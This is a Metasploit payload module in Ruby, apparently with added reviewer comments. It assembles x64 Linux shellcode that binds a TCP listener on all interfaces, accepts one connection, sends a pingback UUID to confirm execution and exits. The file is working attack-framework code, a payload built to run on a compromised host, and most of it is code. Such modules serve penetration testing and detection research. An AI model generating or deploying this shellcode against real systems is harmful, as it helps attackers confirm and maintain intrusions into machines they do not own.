##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
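module MetasploitModule
  # Presumably the byte length of the assembled shellcode below; keep in sync
  # with the asm if it changes.
  CachedSize = 109

  include Msf::Payload::Linux::X64::Prepends
  include Msf::Payload::Single
  include Msf::Payload::Pingback
  include Msf::Payload::Pingback::Options

  # Registers the payload's metadata with the framework.
  #
  # @param info [Hash] module info supplied by the loader; merged over the
  #   defaults below via +merge_info+.
  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'Linux x64 Pingback, Bind TCP Inline',
      'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',
      'Author'      => [ 'bwatters-r7' ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_X64,
      'Handler'     => Msf::Handler::BindTcp,
      'Session'     => Msf::Sessions::Pingback
    ))
  end
  # NOTE: the `end` above was missing in the original listing, which nested
  # `generate` inside `initialize` (so it was only defined once an instance
  # had been constructed). The two methods are now siblings.

  # Assembles the bind-TCP pingback stub.
  #
  # Behaviour of the emitted code, as read from the asm below: create an IPv4
  # stream socket, bind it to 0.0.0.0:LPORT, listen with backlog 1, accept a
  # single client, sys_write the pingback UUID bytes to that client, then
  # exit(1). A failed socket() also exits(1). Nothing is ever read from the
  # connection. On a host this shows up as a short-lived process listening on
  # LPORT on every interface that serves exactly one connection and exits.
  #
  # @param opts [Hash] unused; kept for interface compatibility with other
  #   payload generators.
  # @return [String] raw x64 machine code.
  def generate(opts = {})
    # sin_family and sin_port are folded into one 64-bit immediate so the
    # whole sockaddr_in prefix is written with a single `push rcx`.
    # pack("vn") emits LPORT little-endian followed by AF_INET (2) as a
    # big-endian half-word; unpacking those 4 bytes as big-endian ("N") and
    # placing them in the LOW dword of the immediate means that, once pushed,
    # memory reads `02 00 <port, network order>` - i.e. sin_family then
    # sin_port - followed by the host dword (sin_addr).
    #   22   -> "0x00,0x16"
    #   4444 -> "0x11,0x5c"
    # LPORT is taken via to_i; an unparsable value would become port 0 and
    # bind to an ephemeral port (the framework's option validation is relied
    # on to prevent that).
    encoded_port = [datastore['LPORT'].to_i, 2].pack("vn").unpack("N").first
    # The listener is always bound to the wildcard address; LHOST is not
    # consulted by this payload.
    encoded_host = Rex::Socket.addr_aton("0.0.0.0").unpack("V").first
    encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]

    # Allocate the UUID lazily so repeated generate() calls reuse the same one.
    self.pingback_uuid ||= self.generate_pingback_uuid
    # Render the hex UUID as comma-separated 0x-prefixed bytes for the
    # assembler's `db` directive, e.g. "0x1a,0x2b,...". The number of
    # elements in that list is what the stub passes as the write length.
    uuid_as_db = "0x" + pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")

    # Reviewer notes on the asm (left verbatim, only Ruby comments added):
    # - The struct pushed is a 16-byte sockaddr_in (bind is given addrlen
    #   0x10), despite the in-asm comment saying sockaddr_in6. Only the first
    #   8 bytes are populated by `push rcx`; the remaining 8 (sin_zero) are
    #   whatever already sat on the stack - presumably ignored by the kernel,
    #   confirm if this is ever reused for another family.
    # - accept() is handed addrlen 0x1c (28) while the buffer reserved for the
    #   peer address is two 8-byte pushes (16 bytes). For an AF_INET peer the
    #   kernel should write back at most 16 bytes, so this fits; it would not
    #   for a larger family.
    # - After the write syscall, execution falls through into `failed:`, so
    #   the success path and the socket() failure path both exit(1).
    asm = %Q^
      push rsi
      push rax
      ;SOCKET
      push 0x29
      pop rax
      cdq
      push 0x2
      pop rdi
      push 0x1
      pop rsi
      syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
      test rax, rax
      js failed
      xchg rdi, rax
      mov rcx, #{encoded_host_port}
      push rcx
      mov rsi, rsp
      push rsp
      pop rsi ; store pointer to struct
    bind_call:
      ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
      ; rdi -> fd already stored in rdi
      ; rsi -> pointer to sockaddr_in6 struct already in rsi
      push 0x31
      pop rax ; bind syscall
      push 0x10 ; sockaddr length
      pop rdx ;
      syscall
    listen_call:
      ; int listen(int sockfd, int backlog);
      ; rdi -> fd already stored in rdi
      push 0x32
      pop rax ; listen syscall
      push 0x1
      pop rsi ; backlog
      syscall
    accept_call:
      ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
      ; rdi -> fd already stored in rdi
      push 0x2b
      pop rax ; accept syscall
      cdq ; zero-out rdx via sign-extension
      push rdx
      push rdx
      push rsp
      pop rsi ; when populated, client will be stored in rsi
      push 0x1c
      lea rdx, [rsp] ; pointer to length of rsi (16)
      syscall
      xchg rdi, rax ; grab client fd
    send_pingback:
      ; sys_write(fd:rdi, buf*:rsi, length:rdx)
      push #{uuid_as_db.split(",").length} ; length of the PINGBACK UUID
      pop rdx ; length in rdx
      call get_uuid_address ; put uuid buffer on the stack
      db #{uuid_as_db} ; PINGBACK_UUID
    get_uuid_address:
      pop rsi ; UUID address into rsi
      xor rax, rax ; sys_write = offset 1
      inc rax ; sys_write = offset 1
      syscall ; call sys_write
    failed:
      push 0x3c
      pop rax
      push 0x1
      pop rdi
      syscall ; exit(1)
    ^
    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
  end
end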